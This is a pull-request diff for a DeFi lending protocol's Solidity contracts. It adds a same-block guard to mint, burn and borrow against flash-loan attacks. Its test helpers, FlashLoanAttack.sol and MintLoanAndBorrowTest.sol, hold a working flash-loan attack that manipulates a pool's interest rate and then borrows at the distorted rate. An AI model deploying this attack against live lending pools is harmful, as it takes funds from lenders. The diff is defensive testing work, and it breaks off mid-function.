### PR TITLE
Not in the same block

### DIFF
--- a/contracts/connectors/loantoken/LoanTokenBase.sol
+++ b/contracts/connectors/loantoken/LoanTokenBase.sol
@@ -74,4 +74,9 @@ contract LoanTokenBase is ReentrancyGuard, Ownable, Pausable {
 	/// The maximum trading/borrowing/lending limit per token address.
 	/// 0 -> no limit
 	mapping(address => uint256) public transactionLimit;
+
+	/// @notice A mapping of accounts stores those who
+	///   lend/withdraw on current block.
+	/// block => account => true/false
+	mapping(uint256 => mapping(address => bool)) internal hasInteracted;
 }

--- a/contracts/connectors/loantoken/LoanTokenLogicStandard.sol
+++ b/contracts/connectors/loantoken/LoanTokenLogicStandard.sol
@@ -67,6 +67,8 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 	/**
 	 * @notice Mint loan token wrapper.
 	 * Adds a check before calling low level _mintToken function.
+	 * This function is called by a user to provide liquidity to a loan pool.
+	 * To get back the provided underlying tokens, the user calls burn function.
 	 * The function retrieves the tokens from the message sender, so make sure
 	 * to first approve the loan token contract to access your funds. This is
 	 * done by calling approve(address spender, uint amount) on the ERC20
@@ -75,7 +77,7 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 	 *
 	 * @param receiver The account getting the minted tokens.
 	 * @param depositAmount The amount of underlying tokens provided on the
-	 *   loan. (Not the number of loan tokens to mint).
+	 *   deposit. (Not the number of loan tokens to mint).
 	 *
 	 * @return The amount of loan tokens minted.
 	 * */
@@ -91,8 +93,10 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 
 	/**
 	 * @notice Burn loan token wrapper.
+	 * This function is called by a loan pool liquidity provider requests
+	 * its underlying tokens back.
 	 * Adds a pay-out transfer after calling low level _burnToken function.
-	 * In order to withdraw funds to the pool, call burn on the respective
+	 * In order to withdraw funds from the pool, call burn on the respective
 	 * loan token contract. This will burn your loan tokens and send you the
 	 * underlying token in exchange.
 	 *

--- a/contracts/connectors/loantoken/LoanTokenLogicStandard.sol
+++ b/contracts/connectors/loantoken/LoanTokenLogicStandard.sol
@@ -869,6 +869,7 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 	 * @dev Internal sync required on every loan trade before starting.
 	 * */
 	function _settleInterest() internal {
+		/// @dev To avoid flash loan attacks.
 		uint88 ts = uint88(block.timestamp);
 		if (lastSettleTime_ != ts) {
 			ProtocolLike(sovrynContractAddress).withdrawAccruedInterest(loanTokenAddress);
@@ -981,8 +982,12 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 		uint256[5] memory sentAmounts,
 		bytes memory loanDataBytes
 	) internal returns (uint256, uint256) {
+		/// @dev To avoid running when paused.
 		_checkPause();
+
+		/// @dev To avoid flash loan attacks.
 		_checkNotInTheSameBlock();
+
 		require(
 			sentAmounts[1] <= _underlyingBalance() && /// newPrincipal (borrowed amount + fees)
 				sentAddresses[1] != address(0), /// The borrower.

--- a/contracts/connectors/loantoken/LoanTokenLogicStandard.sol
+++ b/contracts/connectors/loantoken/LoanTokenLogicStandard.sol
@@ -212,7 +212,6 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 		require(withdrawAmount != 0, "6");
 
 		_checkPause();
-		_checkNotInTheSameBlock();
 
 		/// Temporary: limit transaction size.
 		if (transactionLimit[collateralTokenAddress] > 0) require(collateralTokenSent <= transactionLimit[collateralTokenAddress]);
@@ -317,7 +316,6 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 		)
 	{
 		_checkPause();
-		_checkNotInTheSameBlock();
 
 		if (collateralTokenAddress == address(0)) {
 			collateralTokenAddress = wrbtcTokenAddress;
@@ -1393,7 +1391,7 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 	 * need to prevent lending and withdrawing from the pools in the same
 	 * tx/block by the same account.
 	 * */
-	function _checkNotInTheSameBlock() internal view {
+	function _checkNotInTheSameBlock() internal {
 		uint256 _currentBlock;
 
 		/// @dev Get and buffer current block.
@@ -1401,7 +1399,7 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 
 		/// @dev Check there are no previous txs in this block coming from same account.
 		require(!hasInteracted[_currentBlock][msg.sender], "Avoiding flash loan attack: several txs in same block from same account.");
-		
+
 		/// @dev Update previous activity mapping.
 		hasInteracted[_currentBlock][msg.sender] = true;
 	}

--- a/contracts/connectors/loantoken/LoanTokenLogicStandard.sol
+++ b/contracts/connectors/loantoken/LoanTokenLogicStandard.sol
@@ -343,6 +343,7 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 		/// @dev Compute the worth of the total deposit in loan tokens.
 		/// (loanTokenSent + convert(collateralTokenSent))
 		/// No actual swap happening here.
+
 		uint256 totalDeposit = _totalDeposit(collateralTokenAddress, collateralTokenSent, loanTokenSent);
 		require(totalDeposit != 0, "12");
 
@@ -361,7 +362,6 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 		sentAmounts[4] = collateralTokenSent;
 
 		_settleInterest();
-
 		(sentAmounts[1], sentAmounts[0]) = _getMarginBorrowAmountAndRate( /// borrowAmount, interestRate
 			leverageAmount,
 			sentAmounts[1] /// depositAmount
@@ -920,7 +920,7 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 
 			/// @dev Probably not the same due to the price difference.
 			if (collateralTokenAmount != collateralTokenSent) {
-				//scale the loan token amount accordingly, so we'll get the expected position size in the end
+				/// @dev Scale the loan token amount accordingly, so we'll get the expected position size in the end.
 				loanTokenAmount = loanTokenAmount.mul(collateralTokenAmount).div(collateralTokenSent);
 			}
 

--- a/contracts/connectors/loantoken/LoanTokenLogicStandard.sol
+++ b/contracts/connectors/loantoken/LoanTokenLogicStandard.sol
@@ -80,7 +80,10 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 	 * @return The amount of loan tokens minted.
 	 * */
 	function mint(address receiver, uint256 depositAmount) external nonReentrant hasEarlyAccessToken returns (uint256 mintAmount) {
-		/// Temporary: limit transaction size
+		/// @dev To avoid flash loan attacks.
+		_checkNotInTheSameBlock();
+
+		/// @dev Temporary: limit transaction size
 		if (transactionLimit[loanTokenAddress] > 0) require(depositAmount <= transactionLimit[loanTokenAddress]);
 
 		return _mintToken(receiver, depositAmount);
@@ -99,6 +102,9 @@ contract LoanTokenLogicStandard is LoanTokenSettingsLowerAdmin {
 	 * @return The amount of underlying tokens payed to lender.
 	 * */
 	function burn(address receiver, uint256 burnAmount) external nonReentrant returns (uint256 loanAmountPaid) {
+		/// @dev To avoid flash loan attacks.
+		_checkNotInTheSameBlock();
+
 		loanAmountPaid = _burnToken(burnAmount);
 
 		if (loanAmountPaid != 0) {

--- a/contracts/testhelpers/FlashLoanAttack.sol
+++ b/contracts/testhelpers/FlashLoanAttack.sol
@@ -1,0 +1,247 @@
+pragma solidity ^0.5.17;
+pragma experimental ABIEncoderV2;
+// "SPDX-License-Identifier: Apache-2.0"
+
+import "../interfaces/IERC20.sol";
+import "../openzeppelin/Ownable.sol";
+import "./ITokenFlashLoanTest.sol";
+
+/**
+ * @title The interface of the lending pool iToken to attack.
+ * @notice Only burn, mint and borrow functions are required.
+ * */
+interface IToken {
+	function burn(address receiver, uint256 burnAmount) external returns (uint256 loanAmountPaid);
+
+	function mint(address receiver, uint256 depositAmount) external returns (uint256 mintAmount);
+
+	function borrow(
+		bytes32 loanId, /// 0 if new loan.
+		uint256 withdrawAmount,
+		uint256 initialLoanDuration, /// Duration in seconds.
+		uint256 collateralTokenSent, /// If 0, loanId must be provided; any rBTC sent must equal this value.
+		address collateralTokenAddress, /// If address(0), this means rBTC and rBTC must be sent with the call or loanId must be provided.
+		address borrower,
+		address receiver,
+		bytes calldata /// loanDataBytes: arbitrary order data (for future use).
+	)
+		external
+		payable
+		returns (
+			uint256,
+			uint256 /// Returns new principal and new collateral added to loan.
+		);
+}
+
+/**
+ * @title Flash Loan Attack.
+ * @notice This contract performs a flash loan (FL) call to achieve a double goal:
+ *   1.- Get a big amount of underlying tokens (hackDepositAmount)
+ *         during just one transaction. (FL)
+ *   2.- Use that big amount to manipulate the loan rate of another loan pool, and
+ *         then get a borrow principal w/ an extremely low interest.
+ * */
+contract FlashLoanAttack is Ownable {
+
+    /* Storage */
+    address iTokenToHack; /// The address of the lending pool iToken to hack.
+    address collateralToken; /// The address of the collateral token.
+    uint256 withdrawAmount; /// The borrowing principal.
+    uint256 collateralTokenSent; /// The borrowing collateral.
+
+    /* Events */
+	event ExecuteOperation(address loanToken, address iToken, uint256 loanAmount);
+
+	event BalanceOf(uint256 balance);
+
+    /* Functions */
+
+    /**
+     * @notice Set the parameters of the loan pool attack.
+     * @param _iTokenToHack The address of the lending pool iToken to hack.
+     * @param _collateralToken The address of the collateral token.
+     * @param _withdrawAmount The borrowing principal.
+     * @param _collateralTokenSent The borrowing collateral.
+     * */
+	function hackSettings(
+        address _iTokenToHack,
+        address _collateralToken,
+        uint256 _withdrawAmount,
+        uint256 _collateralTokenSent
+	) external onlyOwner {
+        iTokenToHack = _iTokenToHack;
+        collateralToken = _collateralToken;
+        withdrawAmount = _withdrawAmount;
+        collateralTokenSent = _collateralTokenSent;
+    }
+
+    /**
+     * @notice Internal launch of the FL attack.
+     * @param underlyingToken The address of the underlying token.
+     * @param iToken The address of the third party FL token pool.
+     * @param hackDepositAmount The big amount of underlying tokens provided by the FL.
+     * @return Success or failure in binary format.
+     * */
+	function initiateFlashLoanAttack(
+		address underlyingToken,
+		address iToken,
+		uint256 hackDepositAmount
+	) internal returns (bytes memory success) {
+		ITokenFlashLoanTest iTokenContract = ITokenFlashLoanTest(iToken);
+		return
+			iTokenContract.flashBorrow(
+				hackDepositAmount,
+				address(this),
+				address(this),
+				"",
+				abi.encodeWithSignature(
+                    "executeOperation(address,address,uint256)",
+                    underlyingToken,
+                    iToken,
+                    hackDepositAmount
+                )
+			);
+	}
+
+    /**
+     * @notice Send back the underlying tokens used in the hack to the FL provider.
+     * @param underlyingToken The address of the underlying token.
+     * @param iToken The address of the third party FL token pool.
+     * @param hackDepositAmount The big amount of underlying tokens provided by the FL.
+     * */
+	function repayFlashLoan(
+		address underlyingToken,
+		address iToken,
+		uint256 hackDepositAmount
+	) internal {
+		IERC20(underlyingToken).transfer(iToken, hackDepositAmount);
+	}
+
+	/**
+     * @notice This is the callback function passed to the FL contract.
+     * @dev FL contract will call this function after providing the sender,
+     *   (i.e. this contract) with the funds to perform the attack.
+     * @param underlyingToken The address of the underlying token.
+     * @param iToken The address of the third party FL token pool.
+     * @param hackDepositAmount The big amount of underlying tokens provided by the FL.
+     * @return Success or failure in binary format.
+     * */
+    function executeOperation(
+		address underlyingToken,
+		address iToken,
+		uint256 hackDepositAmount
+	) external returns (bytes memory success) {
+        /// @dev Event log to register the big amount of tokens have been received.
+		emit BalanceOf(IERC20(underlyingToken).balanceOf(address(this)));
+
+        /// @dev Event log to register the callback function has been called.
+		emit ExecuteOperation(underlyingToken, iToken, hackDepositAmount);
+
+        /// @dev The following code executes the hack using the funds provided by FL.
+        hackTheLoanPool(underlyingToken, hackDepositAmount);
+
+        /// @dev Payback the FL.
+		repayFlashLoan(underlyingToken, iToken, hackDepositAmount);
+
+        /// @dev Success.
+		return bytes("1");
+	}
+
+	/**
+     * @notice External wrapper to initiateFlashLoanAttack.
+     * @dev Register the underlying token balance before and after the FL.
+     * @param underlyingToken The address of the underlying token.
+     * @param iToken The address of the third party FL token pool.
+     * @param hackDepositAmount The big amount of underlying tokens provided by the FL.
+     * */
+	function doStuffWithFlashLoan(
+		address underlyingToken,
+		address iToken,
+		uint256 hackDepositAmount
+	) external onlyOwner {
+		bytes memory result;
+
+        /// @dev Event log to register the amount of underlying tokens before FL.
+		emit BalanceOf(IERC20(underlyingToken).balanceOf(address(this)));
+
+		result = initiateFlashLoanAttack(underlyingToken, iToken, hackDepositAmount);
+
+        /// @dev Event log to register the amount of underlying tokens after FL.
+		emit BalanceOf(IERC20(underlyingToken).balanceOf(address(this)));
+
+		/// @dev After loan checks and what not.
+		if (hashCompareWithLengthCheck(bytes("1"), result)) {
+			revert("FlashLoanAttack::failed executeOperation");
+		}
+	}
+
+	/**
+     * @notice Check two payloads are equal.
+     * @dev It compares their length and their hashes.
+     * @param a First payload to compare.
+     * @param b Second payload to compare.
+     * */
+	function hashCompareWithLengthCheck(bytes memory a, bytes memory b) internal pure returns (bool) {
+		if (a.length != b.length) {
+			return false;
+		} else {
+			return keccak256(a) == keccak256(b);
+		}
+	}
+
+	/**
+     * @notice Deposit underlying tokens on loan pool to manipulate its
+     * interest rate and borrow a principal w/ the unfair rate and get
+     * back the underlying tokens, all of it in just one transaction.
+     * @param underlyingToken The address of the underlying token.
+     * @param hackDepositAmount The big amount of underlying tokens provided by the FL.
+     * */
+    function hackTheLoanPool(
+        address underlyingToken,
+		uint256 hackDepositAmount
+	) internal {
+		IToken iTokenToHackContract = IToken(iTokenToHack);
+
+		/// @dev Allow the lending pool iTokenToHack to get a deposit
+        ///   from this contract as a lender.
+		IERC20(underlyingToken).approve(iTokenToHack, hackDepositAmount);
+
+		/// @dev Check this contract has the underlying tokens to deposit.
+		require(
+			IERC20(underlyingToken).balanceOf(address(this)) >= hackDepositAmount,
+			"FlashLoanAttack contract has not the required balance: hackDepositAmount."
+		);
+
+		/// @dev Check this contract has the allowance to move the tokens
+        ///   to the lending pool.
+		require(
+			IERC20(underlyingToken).allowance(address(this), iTokenToHack) >= hackDepositAmount,
+			"FlashLoanAttack contract is not allowed to move hackDepositAmount."
+		);
+
+		/// @dev Make a deposit as a lender, in order to manipulate the
+        ///   interest rate of the lending pool.
+		iTokenToHackContract.mint(address(this), hackDepositAmount);
+
+		/// @dev Check this contract has the collateral tokens to deposit.
+		require(
+			IERC20(collateralToken).balanceOf(address(this)) >= collateralTokenSent,
+			"FlashLoanAttack contract has not the required balance: collateralTokenSent."
+		);
+
+		/// @dev Borrow liquidity from the pool w/ an unfair rate.
+		iTokenToHackContract.borrow(
+			"0x0", /// loanId, 0 if new loan.
+			withdrawAmount,
+			86400, /// initialLoanDuration
+			collateralTokenSent,
+			collateralToken, /// collateralTokenAddress
+			address(this), /// borrower
+			address(this), /// receiver
+			"0x0"
+		);
+
+		/// @dev Get back the amount deposited in the first place.
+		iTokenToHackContract.burn(address(this), hackDepositAmount);
+    }
+}

--- a/contracts/testhelpers/FlashLoanMockup.sol
+++ b/contracts/testhelpers/FlashLoanMockup.sol
@@ -1,0 +1,138 @@
+pragma solidity ^0.5.17;
+pragma experimental ABIEncoderV2;
+// "SPDX-License-Identifier: Apache-2.0"
+
+import "../interfaces/IERC20.sol";
+import "../openzeppelin/Ownable.sol";
+import "../openzeppelin/ReentrancyGuard.sol";
+import "./ITokenFlashLoanTest.sol";
+
+/**
+ * @title Flash Loan Mockup.
+ * @notice This contract simulates a third party loan pool providing FL.
+ *   It just does this:
+ *   1.- provides a big amount of underlying tokens.
+ *   2.- executes a transaction.
+ *   3.- expectes the big amount of underlying tokens to be returned, otherwise reverts.
+ * */
+contract FlashLoanMockup is Ownable, ReentrancyGuard {
+    /* Storage */
+    /// @dev Used by flashBorrow to call using an arbitrary address.
+	address internal constant arbitraryCaller = 0x000F400e6818158D541C3EBE45FE3AA0d47372FF;
+
+    /// @dev The address of the underlying token.
+    address loanTokenAddress;
+
+    /* Events */
+    event FlashBorrow(uint256 borrowAmount, address borrower, address target, string signature, bytes data);
+
+    /* Functions */
+
+    /**
+     * @notice Set the parameters of the fake loan pool.
+     * @param _loanTokenAddress The address of the underlying token.
+     * */
+	function settings(
+        address _loanTokenAddress
+	) external onlyOwner {
+        loanTokenAddress = _loanTokenAddress;
+    }
+
+    /**
+     * @notice Execute the FL.
+     * @param borrowAmount The borrowing principal.
+     * @param borrower The address of the borrower to send the tokens to.
+     * @param target The address of the contract to callback.
+     * @param signature The callback function signature.
+     * @param data The callback input data payload.
+     * */
+	function flashBorrow(
+		uint256 borrowAmount,
+		address borrower,
+		address target,
+		string calldata signature,
+		bytes calldata data
+	) external payable nonReentrant returns (bytes memory) {
+        /// @dev Save the token balance previous to sending the tokens.
+        uint256 beforeUnderlyingBalance = IERC20(loanTokenAddress).balanceOf(address(this));
+
+        /// @dev Transfer the tokens to the borrower.
+        _safeTransfer(loanTokenAddress, borrower, borrowAmount, "flashBorrow::Cannot send tokens to calling contract.");
+
+        /// @dev Event log.
+        emit FlashBorrow(borrowAmount, borrower, target, signature, data);
+
+        /// @dev signature + data => callData
+        bytes memory callData;
+        if (bytes(signature).length == 0) {
+            callData = data;
+        } else {
+            callData = abi.encodePacked(bytes4(keccak256(bytes(signature))), data);
+        }
+
+        /// @dev Execute arbitrary call.
+        (bool success, bytes memory returnData) = arbitraryCaller.call.value(msg.value)(
+            abi.encodeWithSelector(
+                0xde064e0d, /// sendCall(address,bytes)
+                target,
+                callData
+            )
+        );
+        require(success, "flashBorrow::Call failed.");
+
+        /// @dev Verify return of flash loan.
+        require(
+            beforeUnderlyingBalance <= IERC20(loanTokenAddress).balanceOf(address(this)),
+            "flashBorrow::Flash loan not returned."
+        );
+
+        return returnData;
+    }
+
+	/**
+	 * @notice Execute the ERC20 token's `transfer` function and reverts
+	 * upon failure the main purpose of this function is to prevent a non
+	 * standard ERC20 token from failing silently.
+	 *
+	 * @dev Wrappers around ERC20 operations that throw on failure (when the
+	 * token contract returns false). Tokens that return no value (and instead
+	 * revert or throw on failure) are also supported, non-reverting calls are
+	 * assumed to be successful.
+	 *
+	 * @param token The ERC20 token address.
+	 * @param to The target address.
+	 * @param amount The transfer amount.
+	 * @param errorMsg The error message on failure.
+	 */
+	function _safeTransfer(
+		address token,
+		address to,
+		uint256 amount,
+		string memory errorMsg
+	) internal {
+		_callOptionalReturn(token, abi.encodeWithSelector(IERC20(token).transfer.selector, to, amount), errorMsg);
+	}
+
+	/**
+	 * @notice Imitate a Solidity high-level call (i.e. a regular function
+	 * call to a contract), relaxing the requirement on the return value:
+	 * the return value is optional (but if data is returned, it must not be
+	 * false).
+	 *
+	 * @param token The token targeted by the call.
+	 * @param data The call data (encoded using abi.encode or one of its variants).
+	 * @param errorMsg The error message on failure.
+	 * */
+	function _callOptionalReturn(
+		address token,
+		bytes memory data,
+		string memory errorMsg
+	) internal {
+		(bool success, bytes memory returndata) = token.call(data);
+		require(success, errorMsg);
+
+		if (returndata.length != 0) {
+			require(abi.decode(returndata, (bool)), errorMsg);
+		}
+	}
+}

--- a/contracts/testhelpers/FlashLoanMockup.sol
+++ b/contracts/testhelpers/FlashLoanMockup.sol
@@ -78,8 +78,6 @@ contract FlashLoanMockup is Ownable, ReentrancyGuard {
 			target.call(
 				callData
 			);
-     
-		// require(success, "flashBorrow::Call failed.");
         require(success, string (returnData));
 
 		/// @dev Verify return of flash loan.

--- a/contracts/testhelpers/FlashLoanMockup.sol
+++ b/contracts/testhelpers/FlashLoanMockup.sol
@@ -74,17 +74,11 @@ contract FlashLoanMockup is Ownable, ReentrancyGuard {
 		}
 
 		/// @dev Execute the callback function.
-		(bool success, bytes memory returnData) =
-			target.call(
-				callData
-			);
-        require(success, string (returnData));
+		(bool success, bytes memory returnData) = target.call(callData);
+		require(success, string(returnData));
 
 		/// @dev Verify return of flash loan.
-		require(
-            beforeUnderlyingBalance <= IERC20(loanTokenAddress).balanceOf(address(this)),
-            "flashBorrow::Flash loan not returned."
-        );
+		require(beforeUnderlyingBalance <= IERC20(loanTokenAddress).balanceOf(address(this)), "flashBorrow::Flash loan not returned.");
 
 		return returnData;
 	}

--- a/contracts/testhelpers/FlashLoanerTest.sol
+++ b/contracts/testhelpers/FlashLoanerTest.sol
@@ -72,4 +72,3 @@ contract FlashLoanerTest is Ownable {
 
 	event BalanceOf(uint256 balance);
 }
-

--- a/contracts/testhelpers/FlashLoanerTest.sol
+++ b/contracts/testhelpers/FlashLoanerTest.sol
@@ -1,0 +1,75 @@
+pragma solidity ^0.5.17;
+pragma experimental ABIEncoderV2;
+// "SPDX-License-Identifier: Apache-2.0"
+
+import "../interfaces/IERC20.sol";
+import "../openzeppelin/Ownable.sol";
+import "./ITokenFlashLoanTest.sol";
+
+contract FlashLoanerTest is Ownable {
+	function initiateFlashLoanTest(
+		address loanToken,
+		address iToken,
+		uint256 flashLoanAmount
+	) internal returns (bytes memory success) {
+		ITokenFlashLoanTest iTokenContract = ITokenFlashLoanTest(iToken);
+		return
+			iTokenContract.flashBorrow(
+				flashLoanAmount,
+				address(this),
+				address(this),
+				"",
+				abi.encodeWithSignature("executeOperation(address,address,uint256)", loanToken, iToken, flashLoanAmount)
+			);
+	}
+
+	function repayFlashLoan(
+		address loanToken,
+		address iToken,
+		uint256 loanAmount
+	) internal {
+		IERC20(loanToken).transfer(iToken, loanAmount);
+	}
+
+	function executeOperation(
+		address loanToken,
+		address iToken,
+		uint256 loanAmount
+	) external returns (bytes memory success) {
+		emit BalanceOf(IERC20(loanToken).balanceOf(address(this)));
+		emit ExecuteOperation(loanToken, iToken, loanAmount);
+		repayFlashLoan(loanToken, iToken, loanAmount);
+		return bytes("1");
+	}
+
+	function doStuffWithFlashLoan(
+		address token,
+		address iToken,
+		uint256 amount
+	) external onlyOwner {
+		bytes memory result;
+		emit BalanceOf(IERC20(token).balanceOf(address(this)));
+
+		result = initiateFlashLoanTest(token, iToken, amount);
+
+		emit BalanceOf(IERC20(token).balanceOf(address(this)));
+
+		// after loan checks and what not.
+		if (hashCompareWithLengthCheck(bytes("1"), result)) {
+			revert("failed executeOperation");
+		}
+	}
+
+	function hashCompareWithLengthCheck(bytes memory a, bytes memory b) internal pure returns (bool) {
+		if (a.length != b.length) {
+			return false;
+		} else {
+			return keccak256(a) == keccak256(b);
+		}
+	}
+
+	event ExecuteOperation(address loanToken, address iToken, uint256 loanAmount);
+
+	event BalanceOf(uint256 balance);
+}
+

--- a/contracts/testhelpers/ITokenFlashLoanTest.sol
+++ b/contracts/testhelpers/ITokenFlashLoanTest.sol
@@ -1,0 +1,15 @@
+pragma solidity ^0.5.17;
+pragma experimental ABIEncoderV2;
+
+// "SPDX-License-Identifier: Apache-2.0"
+
+interface ITokenFlashLoanTest {
+	function flashBorrow(
+		uint256 borrowAmount,
+		address borrower,
+		address target,
+		string calldata signature,
+		bytes calldata data
+	) external payable returns (bytes memory);
+}
+

--- a/contracts/testhelpers/ITokenFlashLoanTest.sol
+++ b/contracts/testhelpers/ITokenFlashLoanTest.sol
@@ -12,4 +12,3 @@ interface ITokenFlashLoanTest {
 		bytes calldata data
 	) external payable returns (bytes memory);
 }
-

--- a/contracts/testhelpers/MintLoanAndBorrowTest.sol
+++ b/contracts/testhelpers/MintLoanAndBorrowTest.sol
@@ -1,0 +1,40 @@
+pragma solidity ^0.5.17;
+pragma experimental ABIEncoderV2;
+// "SPDX-License-Identifier: Apache-2.0"
+
+import "../interfaces/IERC20.sol";
+
+interface IToken {
+    function burn(address receiver, uint256 burnAmount) external returns (uint256 loanAmountPaid);
+    function mint(address receiver, uint256 depositAmount) external returns (uint256 mintAmount);
+	function borrow(
+		bytes32 loanId, /// 0 if new loan.
+		uint256 withdrawAmount,
+		uint256 initialLoanDuration, /// Duration in seconds.
+		uint256 collateralTokenSent, /// If 0, loanId must be provided; any rBTC sent must equal this value.
+		address collateralTokenAddress, /// If address(0), this means rBTC and rBTC must be sent with the call or loanId must be provided.
+		address borrower,
+		address receiver,
+		bytes calldata /// loanDataBytes: arbitrary order data (for future use).
+	)
+		external
+		payable
+		returns (
+			uint256,
+			uint256 /// Returns new principal and new collateral added to loan.
+		);
+}
+
+contract MintLoanAndBorrowTest {
+	function callMintAndBorrowAndBurn(
+		address loanToken,
+		address iToken,
+		uint256 flashLoanAmount
+	) public {
+		IToken iTokenContract = IToken(iToken);
+        IERC20(iToken).approve(address(this), flashLoanAmount);
+		iTokenContract.mint(address(this), flashLoanAmount);
+        iTokenContract.borrow("0x0", flashLoanAmount, 86400, 1000, loanToken, address(this), address(this), "0x0");
+        iTokenContract.burn(address(this), flashLoanAmount);
+	}
+}

--- a/contracts/testhelpers/MintLoanAndBorrowTest.sol
+++ b/contracts/testhelpers/MintLoanAndBorrowTest.sol
@@ -31,45 +31,54 @@ contract MintLoanAndBorrowTest {
 	function callMintAndBorrowAndBurn(
 		address loanToken, /// Underlying Token.
 		address iToken, /// Lending Pool iToken.
-        address collateralToken, /// Collateral Token.
+		address collateralToken, /// Collateral Token.
 		uint256 hackDepositAmount, /// Amount of underlying token to deposit on lending pool.
-        uint256 withdrawAmount, /// Borrowing principal.
-        uint256 collateralTokenSent /// Borrowing collateral.
+		uint256 withdrawAmount, /// Borrowing principal.
+		uint256 collateralTokenSent /// Borrowing collateral.
 	) public {
 		IToken iTokenContract = IToken(iToken);
 
 		/// @dev Allow the lending pool, iToken to get a deposit from this contract as a lender.
 		IERC20(loanToken).approve(iToken, hackDepositAmount);
 
-        /// @dev Check this contract has the underlying tokens to deposit.
-        require(IERC20(loanToken).balanceOf(address(this)) >= hackDepositAmount, "This contract has not the required balance: hackDepositAmount.");
+		/// @dev Check this contract has the underlying tokens to deposit.
+		require(
+			IERC20(loanToken).balanceOf(address(this)) >= hackDepositAmount,
+			"This contract has not the required balance: hackDepositAmount."
+		);
 
-        /// @dev Check this contract has the allowance to move the tokens to the lending pool.
-        require(IERC20(loanToken).allowance(address(this), iToken) >= hackDepositAmount, "This contract has not the allowance to move hackDepositAmount.");
+		/// @dev Check this contract has the allowance to move the tokens to the lending pool.
+		require(
+			IERC20(loanToken).allowance(address(this), iToken) >= hackDepositAmount,
+			"This contract has not the allowance to move hackDepositAmount."
+		);
 
 		/// @dev Make a deposit as a lender, in order to manipulate the interest rate of the lending pool.
 		iTokenContract.mint(address(this), hackDepositAmount);
 
-        /// @dev Check this contract has the collateral tokens to deposit.
-        require(IERC20(collateralToken).balanceOf(address(this)) >= collateralTokenSent, "This contract has not the required balance: collateralTokenSent.");
+		/// @dev Check this contract has the collateral tokens to deposit.
+		require(
+			IERC20(collateralToken).balanceOf(address(this)) >= collateralTokenSent,
+			"This contract has not the required balance: collateralTokenSent."
+		);
 
 		/// @dev Borrow liquidity from the pool at an unfair rate.
 		iTokenContract.borrow(
-            "0x0", /// loanId, 0 if new loan.
-            withdrawAmount,
-            86400, /// initialLoanDuration
-            collateralTokenSent,
-            collateralToken, /// collateralTokenAddress
-            address(this), /// borrower
-            address(this), /// receiver
-            "0x0"
-        );
+			"0x0", /// loanId, 0 if new loan.
+			withdrawAmount,
+			86400, /// initialLoanDuration
+			collateralTokenSent,
+			collateralToken, /// collateralTokenAddress
+			address(this), /// borrower
+			address(this), /// receiver
+			"0x0"
+		);
 
 		/// @dev Get back the amount deposited in the first place.
 		iTokenContract.burn(address(this), hackDepositAmount);
 	}
 
-	function getBalance(address loanToken) public view returns(uint256) {
+	function getBalance(address loanToken) public view returns (uint256) {
 		return IERC20(loanToken).balanceOf(address(this));
 	}
 }

--- a/contracts/testhelpers/MintLoanAndBorrowTest.sol
+++ b/contracts/testhelpers/MintLoanAndBorrowTest.sol
@@ -5,8 +5,10 @@ pragma experimental ABIEncoderV2;
 import "../interfaces/IERC20.sol";
 
 interface IToken {
-    function burn(address receiver, uint256 burnAmount) external returns (uint256 loanAmountPaid);
-    function mint(address receiver, uint256 depositAmount) external returns (uint256 mintAmount);
+	function burn(address receiver, uint256 burnAmount) external returns (uint256 loanAmountPaid);
+
+	function mint(address receiver, uint256 depositAmount) external returns (uint256 mintAmount);
+
 	function borrow(
 		bytes32 loanId, /// 0 if new loan.
 		uint256 withdrawAmount,
@@ -28,23 +30,46 @@ interface IToken {
 contract MintLoanAndBorrowTest {
 	function callMintAndBorrowAndBurn(
 		address loanToken, /// Underlying Token.
-		address iToken, /// Lending Pool.
-		uint256 collateralTokenSent, /// Borrowing collateral.
+		address iToken, /// Lending Pool iToken.
+        address collateralToken, /// Collateral Token.
+		uint256 hackDepositAmount, /// Amount of underlying token to deposit on lending pool.
         uint256 withdrawAmount, /// Borrowing principal.
-        uint256 hackDepositAmount /// Amount of underlying token to deposit on lending pool.
+        uint256 collateralTokenSent /// Borrowing collateral.
 	) public {
 		IToken iTokenContract = IToken(iToken);
-        
-        /// @dev Allow the lending pool, iToken to get a deposit from this contract as a lender.
-        IERC20(iToken).approve(iToken, hackDepositAmount);
 
-        /// @dev Make a deposit as a lender, in order to manipulate the interest rate of the lending pool.
+		/// @dev Allow the lending pool, iToken to get a deposit from this contract as a lender.
+		IERC20(loanToken).approve(iToken, hackDepositAmount);
+
+        /// @dev Check this contract has the underlying tokens to deposit.
+        require(IERC20(loanToken).balanceOf(address(this)) >= hackDepositAmount, "This contract has not the required balance: hackDepositAmount.");
+
+        /// @dev Check this contract has the allowance to move the tokens to the lending pool.
+        require(IERC20(loanToken).allowance(address(this), iToken) >= hackDepositAmount, "This contract has not the allowance to move hackDepositAmount.");
+
+		/// @dev Make a deposit as a lender, in order to manipulate the interest rate of the lending pool.
 		iTokenContract.mint(address(this), hackDepositAmount);
 
-        /// @dev Borrow liquidity from the pool at an unfair rate.
-        iTokenContract.borrow("0x0", collateralTokenSent, 86400, withdrawAmount, loanToken, address(this), address(this), "0x0");
+        /// @dev Check this contract has the collateral tokens to deposit.
+        require(IERC20(collateralToken).balanceOf(address(this)) >= collateralTokenSent, "This contract has not the required balance: collateralTokenSent.");
 
-        /// @dev Get back the amount deposited in the first place.
-        iTokenContract.burn(address(this), hackDepositAmount);
+		/// @dev Borrow liquidity from the pool at an unfair rate.
+		iTokenContract.borrow(
+            "0x0", /// loanId, 0 if new loan.
+            withdrawAmount,
+            86400, /// initialLoanDuration
+            collateralTokenSent,
+            collateralToken, /// collateralTokenAddress
+            address(this), /// borrower
